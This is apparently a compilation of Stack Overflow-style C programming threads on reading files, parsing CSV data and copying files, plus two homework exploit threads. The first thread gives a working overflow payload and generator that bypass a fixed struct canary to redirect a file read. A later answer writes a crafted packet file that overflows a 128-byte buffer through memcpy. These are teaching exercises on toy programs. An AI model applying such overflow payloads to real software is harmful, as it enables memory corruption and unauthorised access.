Exploit a buffer overflow with canary protection in C

I'm trying to exploit this simple program for homework:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFSIZE 1024

typedef struct {
    char flag_content[BUFSIZE];
    char guess[47];
    unsigned canary;
    char flag_file[BUFSIZE];
} st_t;

int main(){
    FILE *f = NULL;
    st_t st = {
        .flag_file = "fake_flag",
        .canary = 0x4249b876
    };
    printf("Guess the flag!\n");
    scanf("%s", st.guess);
    f = fopen(st.flag_file, "rb");
    if (f == NULL){
        printf("flag error\n");
        exit(-1);
    }
    if (fread(st.flag_content, BUFSIZE, 1, f) < 0){
        printf("flag error\n");
        exit(-1);
    }
    if (st.canary != 0x4249b876) {
        printf("canary error\n");
        exit(-1);
    }
    if (!strcmp(st.guess, st.flag_content)){
        printf("You guessed it right!\n");
    } else {
        printf("Sorry but the flag is \"%s\"\n", st.flag_content);
    }
    exit(1);
}
The purpose is to modify st.flag_file, inserting "flag.txt" in place of "fake_flag", so that the program reads that file's content.
It's easy to find the buffer overflow, but there is also a canary, so I wrote this exploit as input to the scanf:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAv¸IBflag.txt
I found online that the hexadecimal 0x4249b876 translates to v¸IB,
but when I run the program from my terminal this is the output:
./mission1
Guess the flag!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAv¸IBflag.txt
canary error
and checking with gdb I found that st.flag_file is "flag.txt", which is correct, but st.canary is 0x4249b8c2.
I cannot understand why.

The problem you are having comes from the alignment requirements of the struct: between guess and the canary the compiler inserts extra padding so that the unsigned canary starts on a suitably aligned boundary. Dump the entire structure and/or the addresses of its members and you will see the padding.
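For instance, here is a minimal sketch (reusing the st_t definition from the question) that prints the member offsets with offsetof; on a typical build, where unsigned needs 4-byte alignment, the canary lands at offset 1072, one byte past the end of guess:

#include <stddef.h>
#include <stdio.h>

#define BUFSIZE 1024
typedef struct {
    char flag_content[BUFSIZE];
    char guess[47];
    unsigned canary;
    char flag_file[BUFSIZE];
} st_t;

int main(void){
    printf("guess:     %zu\n", offsetof(st_t, guess));     /* 1024 */
    printf("canary:    %zu\n", offsetof(st_t, canary));    /* 1072 = 1024 + 47 + 1 padding byte */
    printf("flag_file: %zu\n", offsetof(st_t, flag_file));
    return 0;
}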
The end result is that you need more than 47 bytes of filler (A) to reach the canary, typically one more. So instead of, e.g.:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x76\xb8\x49\x42flag
You will need:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x76\xb8\x49\x42flag
Take note, as well, that escaping the canary bytes is a good idea (to avoid problems with encoding etc.) and makes the input easier to compare against the actual canary. That encoding issue is exactly what you ran into: your terminal sent '¸' (U+00B8) as the UTF-8 pair 0xc2 0xb8, so the 'v' fell into the padding byte and the canary received the bytes 0xc2 0xb8 0x49 0x42, which read little-endian is 0x4249b8c2, precisely the value you saw in gdb.
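To sidestep the terminal's encoding altogether, you could emit the raw bytes from a small generator and pipe them in. A minimal sketch (the program name payload is mine, and it assumes a little-endian machine):

#include <stdio.h>

int main(void){
    for (int i = 0; i < 48; i++)  /* 47 bytes fill guess, 1 more covers the padding */
        putchar('A');
    fwrite("\x76\xb8\x49\x42", 1, 4, stdout); /* canary 0x4249b876, little-endian */
    fputs("flag.txt\n", stdout);              /* lands in flag_file */
    return 0;
}

Then run it as ./payload | ./mission1.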
Off-topic: note that
fread(st.flag_content, BUFSIZE, 1, f) < 0
is always false, since fread returns a size_t (an unsigned type).
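A check that can actually fire might look like this sketch; swapping the size and count arguments also means a flag file shorter than BUFSIZE still counts as a successful read:

if (fread(st.flag_content, 1, BUFSIZE, f) == 0){ /* size_t: compare against 0, not < 0 */
    printf("flag error\n");
    exit(-1);
}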

Related

reading data from large file into struct in C

I am a beginner to C programming. I need to efficiently read millions of records from a file using a struct. Below is an example of the input file:
2,33.1609992980957,26.59000015258789,8.003999710083008
5,15.85200023651123,13.036999702453613,31.801000595092773
8,10.907999992370605,32.000999450683594,1.8459999561309814
11,28.3700008392334,31.650999069213867,13.107999801635742
My current code is shown below; it gives the error "Error file",
suggesting the file is NULL, but the file has data.
#include <stdio.h>
#include <stdlib.h>

struct O_DATA
{
    int index;
    float x;
    float y;
    float z;
};

int main ()
{
    FILE *infile;
    struct O_DATA input;
    infile = fopen("input.dat", "r");
    if (infile == NULL);
    {
        fprintf(stderr, "\nError file\n");
        exit(1);
    }
    while(fread(&input, sizeof(struct O_DATA), 1, infile))
        printf("Index = %d X= %f Y=%f Z=%f", input.index, input.x, input.y, input.z);
    fclose(infile);
    return 0;
}
I need to efficiently read and store data from an input file to process it further. Any help would be really appreciated. Thanks in advance.
First figure out how to convert one line of text to data:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct my_data
{
    unsigned int index;
    float x;
    float y;
    float z;
};

struct my_data *
deserialize_data(struct my_data *data, const char *input, const char *separators)
{
    (void)separators; /* not needed by the sscanf version */
    if (sscanf(input, "%u,%f,%f,%f", &data->index, &data->x, &data->y, &data->z) != 4)
        return NULL;
    return data;
}
Or do the same with strtok:

struct my_data *
deserialize_data(struct my_data *data, const char *input, const char *separators)
{
    char *p;
    struct my_data tmp;
    char *str = strdup(input);         /* make a copy of the input line because strtok modifies it */

    if (!str) {                        /* I couldn't make a copy so I'll die */
        return NULL;
    }
    p = strtok(str, separators);       /* use line for first call to strtok */
    if (!p) goto err;
    tmp.index = strtoul(p, NULL, 0);   /* convert text to integer */
    p = strtok(NULL, separators);      /* strtok remembers the line */
    if (!p) goto err;
    tmp.x = atof(p);
    p = strtok(NULL, separators);
    if (!p) goto err;
    tmp.y = atof(p);
    p = strtok(NULL, separators);
    if (!p) goto err;
    tmp.z = atof(p);
    memcpy(data, &tmp, sizeof(tmp));   /* copy values out */
    goto out;
err:
    data = NULL;
out:
    free(str);
    return data;
}
int main(void) {
    struct my_data somedata;
    deserialize_data(&somedata, "1,2.5,3.12,7.955", ",");
    printf("index: %u, x: %.2f, y: %.2f, z: %.2f\n", somedata.index, somedata.x, somedata.y, somedata.z);
}
Combine it with reading lines from a file:
(just the main function here; insert the rest from the previous example)
int
main(int argc, char *argv[])
{
    FILE *stream;
    char *line = NULL;
    size_t len = 0;
    ssize_t nread;
    struct my_data somedata;

    if (argc != 2) {
        fprintf(stderr, "Usage: %s <file>\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    stream = fopen(argv[1], "r");
    if (stream == NULL) {
        perror("fopen");
        exit(EXIT_FAILURE);
    }
    while ((nread = getline(&line, &len, stream)) != -1) { /* getline is POSIX.1-2008 */
        deserialize_data(&somedata, line, ",");
        printf("index: %u, x: %.2f, y: %.2f, z: %.2f\n", somedata.index, somedata.x, somedata.y, somedata.z);
    }
    free(line);
    fclose(stream);
    exit(EXIT_SUCCESS);
}
You've got an incorrect ; after your if (infile == NULL) test - try removing that...
[Edit: 2nd by 9 secs! :-)]
if (infile == NULL);
{ /* floating block */ }
The above if is a complete statement that does nothing regardless of the value of infile. The "floating" block is executed no matter what infile contains.
Remove the semicolon to 'attach' the "floating" block to the if
if (infile == NULL)
{ /* if block */ }
You already have solid responses in regard to syntax/structs/etc, but I will offer another method for reading the data in the file itself: I like Martin York's CSVIterator solution. This is my go-to approach for CSV processing because it requires less code to implement and has the added benefit of being easily modifiable (i.e., you can edit the CSVRow and CSVIterator defs depending on your needs).
Here's a mostly complete example using Martin's unedited code without structs or classes. In my opinion, and especially so as a beginner, it is easier to start developing your code with simpler techniques. As your code begins to take shape, it is much clearer why and where you need to implement more abstract/advanced devices.
Note this would technically need to be compiled with C++11 or greater because of my use of std::stod (and maybe some other stuff too I am forgetting), so take that into consideration:
//your includes
//...
#include"wherever_CSVIterator_is.h"

int main (int argc, char* argv[])
{
    std::vector<double*> saved;
    std::vector<int> indices;
    std::ifstream file(argv[1]);

    for (CSVIterator loop(file); loop != CSVIterator(); ++loop) { //loop over rows
        int index = std::stoi((*loop)[0]); //CSVRow yields strings, so convert
        indices.push_back(index);          //store int index first, always col 0
        double* tmp = new double[3];       //fresh triplet per row (we know the shape of
                                           //your input data), so the saved pointers
                                           //don't all alias one buffer
        for (size_t k = 1; k < (*loop).size(); k++) { //loop across columns
            tmp[k-1] = std::stod((*loop)[k]);         //save double values now
        }
        saved.push_back(tmp);
    }

    /*now we have two vectors of the same 'size'
      (let's pretend I wrote a check here to confirm this is true),
      so we loop through them together and access with something like:*/
    for (size_t j = 0; j < indices.size(); j++) {
        double* saved_ptr = saved.at(j); //get pointer to first elem of each triplet
        printf("\nindex: %d |", indices.at(j));
        for (int k = 0; k < 3; k++) {
            printf(" %4.3f ", saved_ptr[k]);
        }
        printf("\n");
    }
}
Less fuss to write, but more dangerous (the raw double* triplets are heap-allocated and never freed here, so nothing manages their lifetime). Also some unnecessary copying is present, but we benefit from using std::vector containers in lieu of knowing exactly how much memory we need to allocate.
Don't just give an example of the input file. Specify your input file format, at least on paper or in comments, e.g. in EBNF notation (since your example is textual, it is not a binary file). Decide whether the numbers have to be on different lines (or whether you would accept a file with a single huge line made of a million bytes; read about the Comma Separated Values format). Then code a parser for that format. In your case, some very simple recursive descent parsing is likely enough (and your particular parser won't even use recursion).
Read more about <stdio.h> and its routines. Take time to carefully read that documentation. Since your input is textual, not binary, you don't need fread. Notice that input routines can fail, and you should handle the failure case.
Of course, fopen can fail (e.g. because your working directory is not what you believe it is). You'll better use perror or errno to find more about the failure cause. So at least code:
infile = fopen("input.dat", "r");
if (infile == NULL) {
perror("fopen input.dat");
exit(EXIT_FAILURE);
}
Notice that semi-colons (or their absence) are very important in C (no semi-colon after condition of if). Read again the basic syntax of C language. Read about How to debug small programs. Enable all warnings and debug info when compiling (with GCC, compile with gcc -Wall -g at least). The compiler warnings are very useful!
Remember that fscanf doesn't treat the end of line (newline) differently from a space character. So if the input has to have separate lines, you need to read each line separately.
You'll probably read every line using fgets (or getline) and parse every line individually. You could do that parsing with the help of sscanf (perhaps the %n could be useful) - and you want to use the return count of sscanf. You could also perhaps use strtok and/or strtod to do such a parsing.
Make sure that your parsing and your entire program is correct. With current computers (they are very fast, and most of the time your input file sits in the page cache) it is very likely that it would be fast enough. A million lines can be read pretty quickly (if on Linux, you could compare your parsing time with the time used by wc to count the lines of your file). On my computer (a powerful Linux desktop with AMD2970WX processor -it has lots of cores, but your program uses only one-, 64Gbytes of RAM, and SSD disk) a million lines can be read (by wc) in less than 30 milliseconds, so I am guessing your entire program should run in less than half a second, if given a million lines of input, and if the further processing is simple (in linear time).
You are likely to fill a large array of struct O_DATA and that array should probably be dynamically allocated, and reallocated when needed. Read more about C dynamic memory allocation. Read carefully about C memory management routines. They could fail, and you need to handle that failure (even if it is very unlikely to happen). You certainly don't want to re-allocate that array at every loop. You probably could allocate it in some geometrical progression (e.g. if the size of that array is size, you'll call realloc or a new malloc for some int newsize = 4*size/3 + 10; only when the old size is too small). Of course, your array will generally be a bit larger than what is really needed, but memory is quite cheap and you are allowed to "lose" some of it.
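A sketch of that growth pattern, as a fragment assuming infile is an open FILE * (with stdio.h and stdlib.h included) and using struct O_DATA from the question; the variable names are mine:

struct O_DATA *arr = NULL;
size_t used = 0, allocated = 0;
char line[256];

while (fgets(line, sizeof line, infile)) {
    if (used == allocated) {            /* grow geometrically, not on every loop */
        size_t newsize = 4 * allocated / 3 + 10;
        struct O_DATA *tmp = realloc(arr, newsize * sizeof *tmp);
        if (!tmp) { free(arr); perror("realloc"); exit(EXIT_FAILURE); }
        arr = tmp;
        allocated = newsize;
    }
    if (sscanf(line, "%d,%f,%f,%f",
               &arr[used].index, &arr[used].x, &arr[used].y, &arr[used].z) == 4)
        used++;                         /* keep only fully parsed lines */
}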
But StackOverflow is not a "do my homework" site. I gave some advice above, but you should do your homework.

Getting characters past a certain point in a file in C

I want to take all characters past location 900 from a file called WWW, and put all of these in an array:
//Keep track of all characters past position 900 in WWW.
int Seek900InWWW = lseek(WWW, 900, 0); //goes to position 900 in WWW
printf("%d \n", Seek900InWWW);
if(Seek900InWWW < 0)
    printf("Error seeking to position 900 in WWW.txt");

char EverythingPast900[appropriatesize];
int NextRead;
char NextChar[1];
int i = 0;
while((NextRead = read(WWW, NextChar, sizeof(NextChar))) > 0) {
    EverythingPast900[i] = NextChar[0];
    printf("%c \n", NextChar[0]);
    i++;
}
I created a char array of length 1 since the read system call requires a pointer and I cannot use a regular char. The above code does not work: in fact, it does not print any characters to the terminal as expected by the loop. I think my logic is correct, but perhaps a misunderstanding of what's going on behind the scenes is what is making this hard for me. Or maybe I missed something simple (hope not).
If you already know how many bytes to read (e.g. in appropriatesize) then just read in that many bytes at once, rather than reading in bytes one at a time.
char everythingPast900[appropriatesize];
ssize_t bytesRead = read(WWW, everythingPast900, sizeof everythingPast900);
if (bytesRead > 0 && bytesRead != appropriatesize)
{
    // only everythingPast900[0] to everythingPast900[bytesRead - 1] is valid
}
I made a test version of your code and added bits you left out. Why did you leave them out?
I also made a file named www.txt that has a hundred lines of "This is a test line." in it.
And I found a potential problem, depending on how big your appropriatesize value is and how big the file is: if you write past the end of EverythingPast900, it is possible to crash your program before it ever produces any output. That can happen on Windows, where stdout may not be line buffered depending on which libraries you used.
See the MSDN setvbuf page, in particular "For some systems, this provides line buffering. However, for Win32, the behavior is the same as _IOFBF - Full Buffering."
This seems to work:
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>

int main()
{
    int WWW = open("www.txt", O_RDONLY);
    if(WWW < 0)
        printf("Error opening www.txt\n");

    //Keep track of all characters past position 900 in WWW.
    int Seek900InWWW = lseek(WWW, 900, 0); //goes to position 900 in WWW
    printf("%d \n", Seek900InWWW);
    if(Seek900InWWW < 0)
        printf("Error seeking to position 900 in WWW.txt");

    int appropriatesize = 1000;
    char EverythingPast900[appropriatesize];
    int NextRead;
    char NextChar[1];
    int i = 0;
    while(i < appropriatesize && (NextRead = read(WWW, NextChar, sizeof(NextChar))) > 0) {
        EverythingPast900[i] = NextChar[0];
        printf("%c \n", NextChar[0]);
        i++;
    }
    return 0;
}
As stated in another answer, read more than one byte. The theory behind "buffers" is to reduce the amount of read/write operations due to how slow disk I/O (or network I/O) is compared to memory speed and CPU speed. Look at it as if it is code and consider which is faster: adding 1 to the file size N times and writing N bytes individually, or adding N to the file size once and writing N bytes at once?
Another thing worth mentioning is the fact that read may read fewer than the number of bytes you requested, even if there is more to read. The answer written by #dreamlax illustrates this fact. If you want, you can use a loop to read as many bytes as possible, filling the buffer. Note that I used a function, but you can do the same thing in your main code:
#include <sys/types.h>
#include <unistd.h>
/* Read from a file descriptor, filling the buffer with the requested
* number of bytes. If the end-of-file is encountered, the number of
* bytes returned may be less than the requested number of bytes.
* On error, -1 is returned. See read(2) or read(3) for possible
* values of errno.
* Otherwise, the number of bytes read is returned.
*/
ssize_t
read_fill (int fd, char *readbuf, ssize_t nrequested)
{
    ssize_t nread = 0, nsum = 0;

    while (nrequested > 0
           && (nread = read (fd, readbuf, nrequested)) > 0)
    {
        nsum += nread;
        nrequested -= nread;
        readbuf += nread;
    }
    return (nread == -1) ? -1 : nsum; /* report errors as -1, as promised above */
}
Note that the buffer is not null-terminated as not all data is necessarily text. You can pass buffer_size - 1 as the requested number of bytes and use the return value to add a null terminator where necessary. This is useful primarily when interacting with functions that will expect a null-terminated string:
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* read_fill() as defined above */

int main (void)
{
    char readbuf[4096];
    ssize_t n;
    int fd;

    fd = open ("WWW", O_RDONLY);
    if (fd == -1)
    {
        perror ("unable to open WWW");
        exit (1);
    }
    n = lseek (fd, 900, SEEK_SET);
    if (n == -1)
    {
        fprintf (stderr,
                 "warning: seek operation failed: %s\n"
                 "         reading 900 bytes instead\n",
                 strerror (errno));
        n = read_fill (fd, readbuf, 900);
        if (n < 900)
        {
            fprintf (stderr, "error: fewer than 900 bytes in file\n");
            close (fd);
            exit (1);
        }
    }

    /* Read the file, printing its contents to the screen.
     *
     * Caveat:
     * Not safe for UTF-8 or other variable-width/multibyte
     * encodings since required bytes may get cut off.
     */
    while ((n = read_fill (fd, readbuf, (ssize_t) sizeof readbuf - 1)) > 0)
    {
        readbuf[n] = 0;
        printf ("Read\n****\n%s\n****\n", readbuf);
    }
    if (n == -1)
    {
        close (fd);
        perror ("error reading from WWW");
        exit (1);
    }
    close (fd);
    return 0;
}
Also, you can use a regular char just fine:
char c;
nread = read (fd, &c, 1);
Apparently you didn't know that the unary & operator gets the address of whatever variable is its operand, creating a value of type pointer-to-{typeof var}. Either way, it takes up the same amount of memory, but reading 1 byte at a time is something that normally isn't done, as I've explained.
Mixing declarations and code is a no-no. Also, no, that is not a valid declaration: the compiler should complain about it along the lines of the array being variably defined.
What you want is to dynamically allocate the memory for your char buffer[]. You'll have to use pointers.
http://www.ontko.com/pub/rayo/cs35/pointers.html
Then read this one.
http://www.cprogramming.com/tutorial/c/lesson6.html
Then research a function called memcpy().
Enjoy.
Read through that guide, then you should be able to solve your problem in an entirely different way.
Pseudocode:
declare a buffer of char (pointer related)
allocate memory for said buffer (dynamic memory related)
find the location where you want to start
point to it (pointer related)
figure out how much you want to store (technically part of allocating memory ^^^)
use memcpy() to store what you want in the buffer
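A sketch of how that pseudocode might come together; reading straight into the malloc'd buffer makes the final memcpy() step unnecessary (the file name WWW and position 900 are from the question):

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void){
    int fd = open("WWW", O_RDONLY);
    if (fd < 0) { perror("open WWW"); return 1; }

    off_t end = lseek(fd, 0, SEEK_END);      /* figure out how much to store */
    if (end <= 900) { close(fd); return 1; } /* nothing past position 900 */
    size_t len = (size_t)(end - 900);

    char *buffer = malloc(len);              /* dynamic memory for the buffer */
    if (!buffer) { close(fd); return 1; }

    lseek(fd, 900, SEEK_SET);                /* point at where we want to start */
    ssize_t got = read(fd, buffer, len);     /* may be short; use the return value */
    if (got > 0)
        fwrite(buffer, 1, (size_t)got, stdout);

    free(buffer);
    close(fd);
    return 0;
}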

Parsing Large File in C

For a class, I've been given the task of writing radix sort in parallel using pthreads, openmp, and MPI. My language of choice in this case is C -- I don't know C++ too well.
Anyways, the way I'm going about reading a text file is causing a segmentation fault at around 500MB file size. The files are line-separated 32-bit numbers:
12351
1235234
12
53421
1234
I know C, but I don't know it well; I use things I know, and in this case the things I know are terribly inefficient. My code for reading the text file is as follows:
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <math.h>

int main(int argc, char **argv){
    if(argc != 4) {
        printf("rs_pthreads requires three arguments to run\n");
        return -1;
    }
    char *fileName=argv[1];
    uint32_t radixBits=atoi(argv[2]);
    uint32_t numThreads=atoi(argv[3]);
    if(radixBits > 32){
        printf("radixBitx cannot be greater than 32\n");
        return -1;
    }
    FILE *fileForReading = fopen( fileName, "r" );
    if(fileForReading == NULL){
        perror("Failed to open the file\n");
        return -1;
    }
    char* charBuff = malloc(1024);
    if(charBuff == NULL){
        perror("Error with malloc for charBuff");
        return -1;
    }
    uint32_t numNumbers = 0;
    while(fgetc(fileForReading) != EOF){
        numNumbers++;
        fgets(charBuff, 1024, fileForReading);
    }
    uint32_t numbersToSort[numNumbers];
    rewind(fileForReading);
    int location;
    for(location = 0; location < numNumbers; location++){
        fgets(charBuff, 1024, fileForReading);
        numbersToSort[location] = atoi(charBuff);
    }
With a file of 50 million numbers (~500MB), I'm getting a segmentation fault at rewind, of all places. My knowledge of how file streams work is almost non-existent. My guess is it's trying to malloc without enough memory or something, but I don't know.
So I've got a two-parter here: how is rewind segmentation faulting? Am I just doing a poor job before rewind and failing to check some system call I should be checking?
And, what is a more efficient way to read in an arbitrary amount of numbers from a text file?
Any help is appreciated.
I think the most likely cause here is (ironically enough) a stack overflow. Your numbersToSort array is allocated on the stack, and the stack has a fixed size (varies by compiler and operating system, but 1 MB is a typical number). You should dynamically allocate numbersToSort on the heap (which has much more available space) using malloc():
uint32_t *numbersToSort = malloc(sizeof(uint32_t) * numNumbers);
Don't forget to deallocate it later:
free(numbersToSort);
I would also point out that your first-pass loop, which is intended to count the number of lines, will fail if there are any blank lines. This is because on a blank line, the first character is '\n', and fgetc() will consume it; the next call to fgets() will then be reading the following line, and you'll have skipped the blank one in your count.
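A first pass built on fgets alone avoids that problem; a sketch using the question's variables:

uint32_t numNumbers = 0;
while (fgets(charBuff, 1024, fileForReading)) /* no fgetc to swallow the first byte */
    if (charBuff[0] != '\n')                  /* don't count blank lines */
        numNumbers++;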
The problem is in this line
uint32_t numbersToSort[numNumbers];
You are attempting to allocate a huge array on the stack, and stack size is limited (moreover, older C standards don't allow variable-length arrays at all). So you can try this:
uint32_t *numbersToSort; /* Declare it with other declarations */

/* Remove uint32_t numbersToSort[numNumbers]; */
/* Add the code below */
numbersToSort = malloc(sizeof(uint32_t) * numNumbers);
if (!numbersToSort) {
    /* No memory; do cleanup and bail out */
    return 1;
}

How can I cause a segmentation fault in this program? (to help me find a buffer overflow exploit)

I see that the code below uses memcpy, which I can use to exploit this program and cause a buffer overflow, but I can't seem to make it crash. No matter what character argument I pass to it I just get "error opening packet file." Any ideas how?
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

#define MAX_ADDR_LEN 128
#define ADDR_LENGTH_OFFSET 4
#define ADDR_OFFSET 8

typedef unsigned char shsize_t;

typedef struct{
    char addr[MAX_ADDR_LEN];
    shsize_t len;
} arp_addr;

void
print_address(char *packet)
{
    arp_addr hwaddr;
    int i;

    hwaddr.len = (shsize_t) *(packet + ADDR_LENGTH_OFFSET);
    memcpy(hwaddr.addr, packet + ADDR_OFFSET, hwaddr.len);
    printf("Sender hardware address: ");
    for (i = 0; i < hwaddr.len - 1; i ++)
        printf("%02hhx::", hwaddr.addr[i]);
    printf("%02hhx\n", hwaddr.addr[hwaddr.len - 1]);
    return;
}

int main(int argc, char *argv[])
{
    struct stat sbuf;
    char *packet;
    int fd;

    if (argc != 2){
        printf("Usage: %s <packet file>\n", argv[0]);
        return EXIT_FAILURE;
    }
    if ((stat(argv[1], &sbuf)) < 0){
        printf("Error opening packet file\n");
        return EXIT_FAILURE;
    }
    if ((fd = open(argv[1], O_RDONLY)) < 0){
        printf("Error opening packet file\n");
        return EXIT_FAILURE;
    }
    if ((packet = (char *)malloc(sbuf.st_size * sizeof(char))) == NULL){
        printf("Error allocating memory\n");
        return EXIT_FAILURE;
    }
    if (read(fd, packet, sbuf.st_size) < 0){
        printf("Error reading packet from file\n");
        return EXIT_FAILURE;
    }
    close(fd);
    print_address(packet);
    free(packet);
    return EXIT_SUCCESS;
}
When you do something like write past the end of a buffer there is no guarantee that the program will crash. This is called undefined behavior, which literally means that you can make no reasonable assumptions as to what will happen.
The program itself appears relatively well behaved. As long as len is calculated properly I don't see any way for you to cause an overrun via input. Just because a program uses memcpy doesn't mean that it is vulnerable to attack. The only attack vector I see is if you pass it a carefully crafted file such that the length is calculated incorrectly:
hwaddr.len = (shsize_t) *(packet + ADDR_LENGTH_OFFSET)
In this line the program reads the byte at offset ADDR_LENGTH_OFFSET in packet to get the data length. Obviously that is problematic if you craft a file with an erroneous value for the data length in the header (i.e., a data length > MAX_ADDR_LEN).
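For example, here is a sketch of a program that writes such a file (the name evil.pkt is mine); feeding it to the target then makes print_address() memcpy 255 bytes into a 128-byte buffer:

#include <stdio.h>

int main(void){
    unsigned char pkt[16] = {0};
    pkt[4] = 0xff; /* hwaddr.len = 255 > MAX_ADDR_LEN (128) */
    FILE *f = fopen("evil.pkt", "wb");
    if (!f) return 1;
    fwrite(pkt, 1, sizeof pkt, f); /* bytes from offset 8 onward are the "address" */
    fclose(f);
    return 0;
}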
BTW, the argument is a file, not a character. You won't be able to do anything passing it nonsense input because read will fail.
No matter what character argument i pass to it i just get "error
opening packet file."
You need to pass a valid file name as an argument, not random characters.
As others have indicated, the memcpy() isn't the security problem. The problem is that the length parameter passed to memcpy() comes from user input (the file you specified). If you specify a file whose length byte is larger than the 128-byte buffer, you will probably see a crash (and, yes, 'crash' is accepted vernacular).
Since there is rather limited checking on the size of the packet, you can pass it the name of an empty or very short file and the print_address() code will mess around out of bounds.
Also, since the code reads a length from the data read from the file, you can place an arbitrary number at relevant position and make the code go running around most places in memory.

Tried and true simple file copying code in C?

This looks like a simple question, but I didn't find anything similar here.
Since there is no file copy function in C, we have to implement file copying ourselves, but I don't like reinventing the wheel even for trivial stuff like that, so I'd like to ask the crowd:
What code would you recommend for file copying using fopen()/fread()/fwrite()?
What code would you recommend for file copying using open()/read()/write()?
This code should be portable (windows/mac/linux/bsd/qnx/younameit), stable, time tested, fast, memory efficient and etc. Getting into specific system's internals to squeeze some more performance is welcomed (like getting filesystem cluster size).
This seems like a trivial question but, for example, source code for CP command isn't 10 lines of C code.
This is the function I use when I need to copy from one file to another - with test harness:
/*
@(#)File:           $RCSfile: fcopy.c,v $
@(#)Version:        $Revision: 1.11 $
@(#)Last changed:   $Date: 2008/02/11 07:28:06 $
@(#)Purpose:        Copy the rest of file1 to file2
@(#)Author:         J Leffler
@(#)Modified:       1991,1997,2000,2003,2005,2008
*/
/*TABSTOP=4*/

#include "jlss.h"
#include "stderr.h"

#ifndef lint
/* Prevent over-aggressive optimizers from eliminating ID string */
const char jlss_id_fcopy_c[] = "@(#)$Id: fcopy.c,v 1.11 2008/02/11 07:28:06 jleffler Exp $";
#endif /* lint */

void fcopy(FILE *f1, FILE *f2)
{
    char buffer[BUFSIZ];
    size_t n;

    while ((n = fread(buffer, sizeof(char), sizeof(buffer), f1)) > 0)
    {
        if (fwrite(buffer, sizeof(char), n, f2) != n)
            err_syserr("write failed\n");
    }
}

#ifdef TEST

int main(int argc, char **argv)
{
    FILE *fp1;
    FILE *fp2;

    err_setarg0(argv[0]);
    if (argc != 3)
        err_usage("from to");
    if ((fp1 = fopen(argv[1], "rb")) == 0)
        err_syserr("cannot open file %s for reading\n", argv[1]);
    if ((fp2 = fopen(argv[2], "wb")) == 0)
        err_syserr("cannot open file %s for writing\n", argv[2]);
    fcopy(fp1, fp2);
    return(0);
}

#endif /* TEST */
Clearly, this version uses file pointers from standard I/O and not file descriptors, but it is reasonably efficient and about as portable as it can be.
Well, except the error function - that's peculiar to me. As long as you handle errors cleanly, you should be OK. The "jlss.h" header declares fcopy(); the "stderr.h" header declares err_syserr() amongst many other similar error reporting functions. A simple version of the function follows - the real one adds the program name and does some other stuff.
#include "stderr.h"
#include <stdarg.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
void err_syserr(const char *fmt, ...)
{
int errnum = errno;
va_list args;
va_start(args, fmt);
vfprintf(stderr, fmt, args);
va_end(args);
if (errnum != 0)
fprintf(stderr, "(%d: %s)\n", errnum, strerror(errnum));
exit(1);
}
The code above may be treated as having a modern BSD license or GPL v3 at your choice.
As far as the actual I/O goes, the code I've written a million times in various guises for copying data from one stream to another goes something like this. It returns 0 on success, or -1 with errno set on error (in which case any number of bytes might have been copied).
Note that for copying regular files, you can skip the EAGAIN stuff, since regular files are always blocking I/O. But inevitably if you write this code, someone will use it on other types of file descriptors, so consider it a freebie.
There's a file-specific optimisation that GNU cp does, which I haven't bothered with here, that for long blocks of 0 bytes instead of writing you just extend the output file by seeking off the end.
void block(int fd, int event) {
    struct pollfd topoll;
    topoll.fd = fd;
    topoll.events = event;
    poll(&topoll, 1, -1);
    // no need to check errors - if the stream is bust then the
    // next read/write will tell us
}

int copy_data_buffer(int fdin, int fdout, void *buf, size_t bufsize) {
    for(;;) {
        char *pos; // char *, so the pointer arithmetic below is valid C
        // read data to buffer
        ssize_t bytestowrite = read(fdin, buf, bufsize);
        if (bytestowrite == 0) break; // end of input
        if (bytestowrite == -1) {
            if (errno == EINTR) continue; // signal handled
            if (errno == EAGAIN) {
                block(fdin, POLLIN);
                continue;
            }
            return -1; // error
        }
        // write data from buffer
        pos = buf;
        while (bytestowrite > 0) {
            ssize_t bytes_written = write(fdout, pos, bytestowrite);
            if (bytes_written == -1) {
                if (errno == EINTR) continue; // signal handled
                if (errno == EAGAIN) {
                    block(fdout, POLLOUT);
                    continue;
                }
                return -1; // error
            }
            bytestowrite -= bytes_written;
            pos += bytes_written;
        }
    }
    return 0; // success
}
// Default value. I think it will get close to maximum speed on most
// systems, short of using mmap etc. But porters / integrators
// might want to set it smaller, if the system is very memory
// constrained and they don't want this routine to starve
// concurrent ops of memory. And they might want to set it larger
// if I'm completely wrong and larger buffers improve performance.
// It's worth trying several MB at least once, although with huge
// allocations you have to watch for the linux
// "crash on access instead of returning 0" behaviour for failed malloc.
#ifndef FILECOPY_BUFFER_SIZE
#define FILECOPY_BUFFER_SIZE (64*1024)
#endif
int copy_data(int fdin, int fdout) {
    // optional exercise for reader: take the file size as a parameter,
    // and don't use a buffer any bigger than that. This prevents
    // memory-hogging if FILECOPY_BUFFER_SIZE is very large and the file
    // is small.
    for (size_t bufsize = FILECOPY_BUFFER_SIZE; bufsize >= 256; bufsize /= 2) {
        void *buffer = malloc(bufsize);
        if (buffer != NULL) {
            int result = copy_data_buffer(fdin, fdout, buffer, bufsize);
            free(buffer);
            return result;
        }
    }
    // could use a stack buffer here instead of failing, if desired.
    // 128 bytes ought to fit on any stack worth having, but again
    // this could be made configurable.
    return -1; // errno is ENOMEM
}
To open the input file:
int fdin = open(infile, O_RDONLY|O_BINARY, 0);
if (fdin == -1) return -1;
Opening the output file is tricksy. As a basis, you want:
int fdout = open(outfile, O_WRONLY|O_BINARY|O_CREAT|O_TRUNC, 0x1ff);
if (fdout == -1) {
